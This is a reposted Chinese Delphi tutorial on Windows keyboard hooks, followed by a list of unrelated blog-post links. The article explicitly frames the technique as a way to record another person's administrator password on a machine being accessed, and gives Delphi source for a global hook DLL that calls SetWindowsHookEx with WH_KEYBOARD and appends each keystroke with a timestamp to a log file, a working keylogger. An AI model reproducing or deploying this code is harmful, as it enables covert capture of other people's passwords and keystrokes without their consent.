Delphi编程使用HOOK监视Windows
来源:互联网 发布:广州番禺数据恢复 编辑:程序博客网 时间:2024/04/28 18:44
每个程序都有自己的生存空间,在Windows系统中你可以在任何时候让你的程序执行一些操作
,还可以触发消息,触发的消息分为三种,
一是操作你程序的界面,onClick,onMouseMove等等,另外一个可以使用Windows的消息机制来捕获
一些系统消息,
但是如果你想在任何时候监控任何程序的情况那可能你就会选择HOOK来实现了,虽然还有其他方法
,但不得不承认,
HOOK是一个比较简单解决问题的途径。
下面就来举个例子(使用Delphi7.0调试通过):
如果你需要访问某个人的机器,那在运行//SB之后那个人就会在你机器上敲入他的adminsitrator
密码,当然,
你也可以使用黑客工具来得到他的密码,但是,为什么不自己尝试一下写个程序记录所有的键盘操
作呢?
首先需要申明一点,Hook不同于一般的应用程序,需要作为一个全局DLL出现,否则无法在你
程序不激活的状态捕获其他信息的,
(当然你可以用Windows消息,这个问题不在这里讨论)。
写个DLL定义一下函数
function setkeyhook:bool;export;
function endkeyhook:bool;export;
procedure keyhookexit;far;
procedure SetMainHandle(Handle: HWND); export;forward;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
procedure EntryPointProc(Reason: Integer);
const
hMapObject: THandle = 0;
begin
case reason of
DLL_PROCESS_ATTACH:
begin
hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), ’_CBT
’);
rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);
end;
DLL_PROCESS_DETACH:
begin
try
UnMapViewOfFile(rHookRec);
CloseHandle(hMapObject);
except
end;
end;
end;
end;
procedure keyhookexit;far;
begin
if hNexthookproc<>0 then endkeyhook;
exitproc:=procsaveexit;
end;
function endkeyhook:bool;export;
begin
if hNexthookproc<>0 then
begin
unhookwindowshookex(hNexthookproc);
hNexthookproc:=0;
messagebeep(0);
end;
result:=hNexthookproc=0;
MainHandle:=0;
end;
function Setkeyhook:bool;export;
begin
hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);
result:=hNexthookproc<>0;
end;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;
var
s:Tstringlist;
begin
if icode<0 then
begin
result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);
exit;
end;
if lparam<0 then
begin
exit;
end;
s:=TStringlist.Create;
if FileExists(afilename) then
s.LoadFromFile(afilename);
//将敲打的键盘字符保存到文件中
s.Add(formatdatetime(’YYYYMMDD hh:nn:ss:zzz: ’,now) + char(wParam) );
s.SaveToFile(afilename);
s.Free;
result:=0;
end;
http://web5588.cn(名扬在线)
- Delphi编程使用HOOK监视Windows
- Delphi编程使用HOOK监视Windows
- 使用HOOK随心监视Windows
- 使用HOOK随心监视Windows
- Hook :突破Windows NT内核进程监视设置限制
- Windows Hook 易核心编程
- hook监视窗口
- [Windows编程] 监视DLL装载/卸载
- [Windows编程] 监视DLL装载/卸载
- Delphi实现监视Windows窗口的创建销毁
- [Delphi]钩子(HOOK)机制的使用
- DELPHI --HOOK
- HOOK delphi
- HOOK-DELPHI
- Windows中HOOK的使用
- 使用LoadRunner监视Windows服务器设置步骤
- 使用ServiceController监视和控制Windows服务
- Windows Phone 监视内存使用情况
- 运行的时候总是出现MSVCP71.DLL没有找到
- bmp 转换 txt (一个有有趣的算法)
- 有一种异性朋友叫温暖
- UltraEdit.Pro.14.00b+1.patch-SND
- 一步步教你优化Delphi字串查找
- Delphi编程使用HOOK监视Windows
- lucene搜索引擎
- VB.NET 時間を改めるプロジェクト
- 我三个月啦
- 《Effective C#》Item 22:避免返回类内部成员的引用
- flash player10 in flex3 builder
- 第一天
- mapxtreme for java 连接Mysql
- 第一天